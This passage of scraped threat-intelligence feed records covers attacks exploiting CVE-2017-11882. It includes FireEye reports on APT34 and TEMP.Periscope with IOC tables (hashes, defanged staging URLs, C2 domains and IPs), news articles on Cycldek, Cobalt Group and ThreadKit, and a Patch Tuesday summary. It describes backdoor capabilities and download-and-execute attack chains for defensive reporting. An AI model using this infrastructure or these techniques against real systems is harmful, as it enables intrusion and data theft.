from:\n\nhxxp://94.23.172.164/dupdatechecker.doc.\n\nAs shown in Figure 12, the script within the dupatechecker.doc file attempts to download another file named dupatechecker.exe from the same server. The file also contains a comment by the malware author that appears to be an apparent taunt to security researchers.\n\n \nFigure 12: Contents of dupdatechecker.doc script\n\nThe dupatechecker.exe file (MD5: C9F16F0BE8C77F0170B9B6CE876ED7FB) drops both BONDUPDATER and POWRUNER. These files connect to proxychecker[.]pro for C2.\n\n#### Outlook and Implications\n\nRecent activity by APT34 demonstrates that they are capable group with potential access to their own development resources. During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities (CVE-2017-0199 and CVE-2017-11882)** **to target organizations in the Middle East. We assess that APT34\u2019s efforts to continuously update their malware, including the incorporation of DGA for C2, demonstrate the group\u2019s commitment to pursing strategies to deter detection. We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region.\n\n#### IOCs\n\n**Filename / Domain / IP Address**\n\n| \n\n**MD5 Hash or Description** \n \n---|--- \n \nCVE-2017-11882 exploit document\n\n| \n\nA0E6933F4E0497269620F44A083B2ED4 \n \nb.txt\n\n| \n\n9267D057C065EA7448ACA1511C6F29C7 \n \nv.txt/v.vbs\n\n| \n\nB2D13A336A3EB7BD27612BE7D4E334DF \n \ndUpdateCheckers.base\n\n| \n\n4A7290A279E6F2329EDD0615178A11FF \n \nhUpdateCheckers.base\n\n| \n\n841CE6475F271F86D0B5188E4F8BC6DB \n \ncUpdateCheckers.bat\n\n| \n\n52CA9A7424B3CC34099AD218623A0979 \n \ndUpdateCheckers.ps1\n\n| \n\nBBDE33F5709CB1452AB941C08ACC775E \n \nhUpdateCheckers.ps1\n\n| \n\n247B2A9FCBA6E9EC29ED818948939702 \n \nGoogleUpdateschecker.vbs\n\n| \n\nC87B0B711F60132235D7440ADD0360B0 \n \nhxxp://mumbai-m[.]site\n\n| \n\nPOWRUNER C2 \n \nhxxp://dns-update[.]club\n\n| \n\nMalware Staging Server \n \nCVE-2017-0199 exploit document\n\n| \n\n63D66D99E46FB93676A4F475A65566D8 \n \n94.23.172.164:80\n\n| \n\nMalware Staging Server \n \ndupdatechecker.doc\n\n| \n\nD85818E82A6E64CA185EDFDDBA2D1B76 \n \ndupdatechecker.exe\n\n| \n\nC9F16F0BE8C77F0170B9B6CE876ED7FB \n \nproxycheker[.]pro\n\n| \n\nC2 \n \n46.105.221.247\n\n| \n\nHas resolved mumbai-m[.]site & hpserver[.]online \n \n148.251.55.110\n\n| \n\nHas resolved mumbai-m[.]site and dns-update[.]club \n \n185.15.247.147\n\n| \n\nHas resolved dns-update[.]club \n \n145.239.33.100\n\n| \n\nHas resolved dns-update[.]club \n \n82.102.14.219\n\n| \n\nHas resolved ns2.dns-update[.]club & hpserver[.]online & anyportals[.]com \n \nv7-hpserver.online.hta\n\n| \n\nE6AC6F18256C4DDE5BF06A9191562F82 \n \ndUpdateCheckers.base\n\n| \n\n3C63BFF9EC0A340E0727E5683466F435 \n \nhUpdateCheckers.base\n\n| \n\nEEB0FF0D8841C2EBE643FE328B6D9EF5 \n \ncUpdateCheckers.bat\n\n| \n\nFB464C365B94B03826E67EABE4BF9165 \n \ndUpdateCheckers.ps1\n\n| \n\n635ED85BFCAAB7208A8B5C730D3D0A8C \n \nhUpdateCheckers.ps1\n\n| \n\n13B338C47C52DE3ED0B68E1CB7876AD2 \n \ngoogleupdateschecker.vbs\n\n| \n\nDBFEA6154D4F9D7209C1875B2D5D70D5 \n \nhpserver[.]online\n\n| \n\nC2 \n \nv7-anyportals.hta\n\n| \n\nEAF3448808481FB1FDBB675BC5EA24DE \n \ndUpdateCheckers.base\n\n| \n\n42449DD79EA7D2B5B6482B6F0D493498 \n \nhUpdateCheckers.base\n\n| \n\nA3FCB4D23C3153DD42AC124B112F1BAE \n \ndUpdateCheckers.ps1\n\n| \n\nEE1C482C41738AAA5964730DCBAB5DFF \n \nhUpdateCheckers.ps1\n\n| \n\nE516C3A3247AF2F2323291A670086A8F \n \nanyportals[.]com\n\n| \n\nC2\n", "modified": "2017-12-07T12:00:00", "published": "2017-12-07T12:00:00", "id": "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "href": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", "type": "fireeye", "title": "New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "#### Intrusions Focus on the Engineering and Maritime Sector\n\nSince early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as \u201c[Leviathan](<https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets>)\u201d by other security firms. \n\nThe current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.\n\n#### TEMP.Periscope Background\n\nActive since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on \u201cNanHaiShu.\u201d\n\n#### TTPs and Malware Used\n\nIn their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:\n\n * AIRBREAK: a JavaScript-based backdoor also reported as \u201cOrz\u201d that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.\n * BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.\n * PHOTO: a DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.\n * HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.\n * LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.\n * MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.\n * China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.\n\nThe following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:\n\n * Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.\n * [BLACKCOFFEE](<https://www.fireeye.com/blog/threat-research/2015/05/hiding_in_plain_sigh.html>): a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by [APT17](<https://www2.fireeye.com/WEB-2015RPTAPT17.html>) and other Chinese cyber espionage operators.\n\nAdditional identifying TTPs include:\n\n * Spear phishing, including the use of probably compromised email accounts.\n * Lure documents using CVE-2017-11882 to drop malware.\n * Stolen code signing certificates used to sign malware.\n * Use of bitsadmin.exe to download additional tools.\n * Use of PowerShell to download additional tools.\n * Using C:\\Windows\\Debug and C:\\Perflogs as staging directories.\n * Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.\n * Using Windows Management Instrumentation ([WMI) for persistence](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf>).\n * Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.\n * Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal.\n\n#### Implications\n\nThe current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.\n\nAs we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.\n\n#### Indicators\n\n_File_****\n\n| \n\n_Hash_****\n\n| \n\n_Description_ \n \n---|---|--- \n \nx.js\n\n| \n\n3fefa55daeb167931975c22df3eca20a\n\n| \n\nHOMEFRY, a 64-bit Windows password dumper/cracker \n \nmt.exe\n\n| \n\n40528e368d323db0ac5c3f5e1efe4889\n\n| \n\nMURKYTOP, a command-line reconnaissance tool \n \ncom4.js****\n\n| \n\na68bf5fce22e7f1d6f999b7a580ae477\n\n| \n\nAIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages \n \n#### Historical Indicators\n\n_File_****\n\n| \n\n_Hash_****\n\n| \n\n_Description_ \n \n---|---|--- \n \ngreen.ddd\n\n| \n\n3eb6f85ac046a96204096ab65bbd3e7e\n\n| \n\nAIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages \n \nBGij\n\n| \n\n6e843ef4856336fe3ef4ed27a4c792b1\n\n| \n\nBeacon, a commercially available backdoor \n \nmsresamn.ttf****\n\n| \n\na9e7539c1ebe857bae6efceefaa9dd16\n\n| \n\nPHOTO, also reported as Derusbi \n \n1024-aa6a121f98330df2edee6c4391df21ff43a33604****\n\n| \n\nbd9e4c82bf12c4e7a58221fc52fed705\n\n| \n\nBADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration\n", "modified": "2018-03-16T00:00:00", "published": "2018-03-16T00:00:00", "id": "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "href": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "type": "fireeye", "title": "Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2020-06-04T10:29:40", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "description": "[](<https://thehackernews.com/images/-XDTHXeRiSOs/XtiwKuAffDI/AAAAAAAAAZ0/agv-iIrKqt8IiznmwrS_g-Hhgu-R--8RgCLcBGAsYHQ/s728-e100/malware.jpg>)\n\nA Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to a newly published research by Kaspersky yesterday. \n \nThe APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos. \n \n\"One of the newly revealed tools is named **USBCulprit **and has been found to rely on USB media in order to exfiltrate victim data,\" [Kaspersky](<https://securelist.com/cycldek-bridging-the-air-gap/97157/>) said. \"This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\" \n\n\n \nFirst observed by [CrowdStrike](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop a malware called NewCore RAT. \n \n\n\n## Exfiltrating Data to Removable Drives\n\n \nKaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure, but also contain features that are exclusive to RedCore \u2014 namely a keylogger and an RDP logger that captures details about users connected to a system via RDP. \n \n\n\n[](<https://thehackernews.com/images/-Uo7TkL_TEQg/XtirFVGHNWI/AAAAAAAAAZk/3fpINW9IErAOfGCG0T7fZGr5K9LM3BnuACLcBGAsYHQ/s728-e100/usb-virus.jpg>)\n\n \n\"Each cluster of activity had a different geographical focus,\" the researchers said. \"The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.\" \n \nBoth BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems. \n \nChief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive. \n \n\n\n[](<https://thehackernews.com/images/-T3eT2rv9TYU/XtirEJq7SnI/AAAAAAAAAZg/x2SxjApz6oolC0VavLfhqMYUtS4eQTMcQCLcBGAsYHQ/s728-e100/usb-computer-virus.jpg>)\n\n \nWhat's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine. \n \nA telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of last year. \n\n\n \nThe initial infection mechanism relies on leveraging malicious binaries that mimic legitimate antivirus components to load USBCulprit in what's called [DLL search order hijacking](<https://attack.mitre.org/techniques/T1038/>) before it proceeds to collect the relevant information, save it in the form of an encrypted RAR archive, and exfiltrate the data to a connected removable device. \n \n\"The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,\" the researchers said. \"This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.\" \n \nUltimately, the similarities and differences between the two pieces of malware are indicative of the fact that the actors behind the clusters are sharing code and infrastructure, while operating as two different offshoots under a single larger entity. \n \n\"Cycldek is an example of an actor that has broader capability than publicly perceived,\" Kaspersky concluded. \"While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\"\n", "modified": "2020-06-04T08:31:39", "published": "2020-06-04T08:31:00", "id": "THN:42E3306FC75881CF8EBD30FA8291FF29", "href": "https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html", "type": "thn", "title": "New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:17", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-0819", "CVE-2018-4871", "CVE-2018-0786"], "description": "[](<https://2.bp.blogspot.com/-beOJSQDFs8E/WlWzGhDEy1I/AAAAAAAAvao/HtLyZwdkdO0s6swi2W8MGUFOiL97VBjtACLcBGAs/s1600/microsoft-windows-update.png>)\n\nIf you think that only CPU updates that address this year's major security flaws\u2014[Meltdown and Spectre](<https://thehackernews.com/2018/01/meltdown-spectre-patches.html>)\u2014are the only ones you are advised to grab immediately, there are a handful of major security flaws that you should pay attention to. \n \nMicrosoft has issued its first Patch Tuesday for 2018 to address 56 CVE-listed flaws, including a zero-day vulnerability in MS Office related that had been actively exploited by several threat groups in the wild. \n \nSixteen of the security updates are listed as critical, 38 are rated important, one is rated moderate, and one is rated as low in severity. The updates address security flaws in Windows, Office, Internet Explorer, Edge, ChakraCore, ASP.NET, and the .NET Framework. \n \nThe zero-day vulnerability ([CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)), described by Microsoft as a memory corruption flaw in Office, is already being targeted in the wild by several threat actor groups in the past few months. \n \nThe vulnerability, discovered by several researchers from Chinese companies Tencent and Qihoo 360, ACROS Security's 0Patch Team, and Check Point Software Technologies, can be exploited for remote code execution by tricking a targeted user into opening a specially crafted malicious Word file in MS Office or WordPad. \n \nAccording to the company, this security flaw is related to CVE-2017-11882\u2014a 17-year-old [vulnerability in the Equation Editor](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) functionality (EQNEDT32.EXE), which Microsoft addressed in November. \n \nWhen researchers at 0Patch were analysing CVE-2017-11882, they discovered a new, related vulnerability (CVE-2018-0802). More details of CVE-2018-0802 can be found in a [blog post](<https://research.checkpoint.com/another-office-equation-rce-vulnerability/>) published by Check Point. \n \nBesides CVE-2018-0802, the company has addressed nine more remote code execution and memory disclosure vulnerabilities in MS Office. \n \nA spoofing vulnerability (CVE-2018-0819) in Microsoft Outlook for MAC, which has been listed as publicly disclosed ([Mailsploit attack](<https://thehackernews.com/2017/12/email-spoofing-client.html>)), has also addressed by the company. The vulnerability does not allow some versions Outlook for Mac to handle the encoding and display of email addresses properly, causing antivirus or anti-spam scanning not to work as intended. \n \nMicrosoft also addressed a certificate validation bypass vulnerability (CVE-2018-0786) in .NET Framework (and .NET Core) that could allow malware authors to show their invalid certificates as valid. \n \n\"An attacker could present a certificate that is marked invalid for a specific use, but the component uses it for that purpose,\" describes Microsoft. \"This action disregards the Enhanced Key Usage taggings.\" \n \nThe company has also patched a total of 15 vulnerabilities in the scripting engine used by Microsoft Edge and Internet Explorer. \n \nAll these flaws could be exploited for remote code execution by tricking a targeted user into opening a specially-crafted webpage that triggers a memory corruption error, though none of these has been exploited in the wild yet. \n \nMeanwhile, Adobe has [patched](<https://helpx.adobe.com/security/products/flash-player/apsb18-01.html>) a single, out of bounds read flaw (CVE-2018-4871) this month that could allow for information disclosure, though no active exploits have been seen in the wild. \n \nUsers are strongly advised to apply security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. \n \nFor installing security updates, simply head on to Settings \u2192 Update & security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually.\n", "modified": "2018-01-11T07:11:17", "published": "2018-01-09T19:35:00", "id": "THN:ED087560040A02BCB1F68DE406A7F577", "href": "https://thehackernews.com/2018/01/microsoft-security-patch.html", "type": "thn", "title": "Microsoft Releases Patches for 16 Critical Flaws, Including a Zero-Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2019-05-30T05:52:39", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, it\u2019s capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "modified": "2018-05-28T12:21:42", "published": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:20", "bulletinFamily": "info", "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "description": "Despite the high profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite an arrest earlier this year of a key member, of the Cobalt Group remains active.\n * A new version on the malware ThreadKit is being actively distributed in October 2018.\n * The CobInt trojan uses a XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In one single campaign, it was credited for stealing over $32,000 from six Eastern Europe ATMs. In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when the EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technology](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0 **\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and one notably being [the now patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing a RFT Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into it\u2019s own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out the update including a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills **\n\nThe ThreadKit payload is the trojan Coblnt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, a XOR routine used to decode the initial Coblnt payload. A XOR, or XOR cipher, is an encryption algorithm that operates on a set of known principles. Encryption and decryption can be performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt group members have only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "modified": "2018-12-11T18:40:00", "published": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:59:18", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "SAN FRANCISCO\u2013The concept of threat modeling has evolved quite a lot in the last few years, moving from an activity that massive software companies such as Microsoft and Google use to anticipate and defend against potential threats to their products to something that many smaller organizations practice. Starting a threat modeling system can seem daunting, but the good news is that there\u2019s no one right way to do it, just the right way for a given organization.\n\nMicrosoft has been using some form of threat modeling internally for many years now and the company\u2019s security group has spent a lot of time speaking publicly about the benefits of the practice and advocating for wider adoption of it. [Adam Shostack](<https://threatpost.com/adam-shostack-science-security-and-value-thinking-differently-040709/72705>), a program manager in Microsoft\u2019s Trustworthy Computing group, has been one of the main proponents of threat modeling\u2019s use, and he said that he\u2019s reached the conclusion that threat modeling is not one defined set of methods or principles but a fluid and dynamic way of reducing security risks to products and services.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d he said during a talk at the RSA Conference here Wednesday. \u201cThere\u2019s no one way to threat model. The right way is the way that fixes good threats.\u201d\n\nSecurity experts often will tell developers that in order to build defensible and resilient products, they need to think like an attacker. That is, look at the product or system the way that a potential adversary would see it, find the weak spots that are ripe for exploitation and correct them. But Shostack said that isn\u2019t exactly the most useful advice.\n\n\u201cBeing told to think like an attacker is like being told to think like a professional chef,\u201d said Shostack, who recently published a new [book](<http://threatmodelingbook.com/>) on the topic, _Threat Modeling: Designing for Security_. \u201cA lot of security people like to cook, but if someone told you to go to the store and buy enough chickens for a restaurant that seats 78 people and turns over three times a night, you\u2019d have no idea what to do.\u201d\n\nAs with nearly everything in security these days, there are a number of methodologies, models, checklists and other aids designed to help organizations implement threat modeling. Those tools can be useful and have their places, Shostack said, but none of them should be seen as the perfect answer. Rather, use them as part of the process of putting building blocks in place as you construct a threat modeling program.\n\n\u201cWe want to focus on finding good threats. Use your assets and the actions of attackers to make threats real,\u201d he said. \u201cIt\u2019s hard to go from a checklist to a broader system. You have to think about threat modeling your software as an end-to-end process.\u201d\n\nOf course, even the best and most well-constructed threat modeling program still has to deal with the most unpredictable and dangerous threat to the product: the end user. Trying to predict how users will misuse, abuse and break a piece of software is a fool\u2019s errand, but Shostack said it\u2019s still up to the professionals to put their products in the best position to survive in today\u2019s 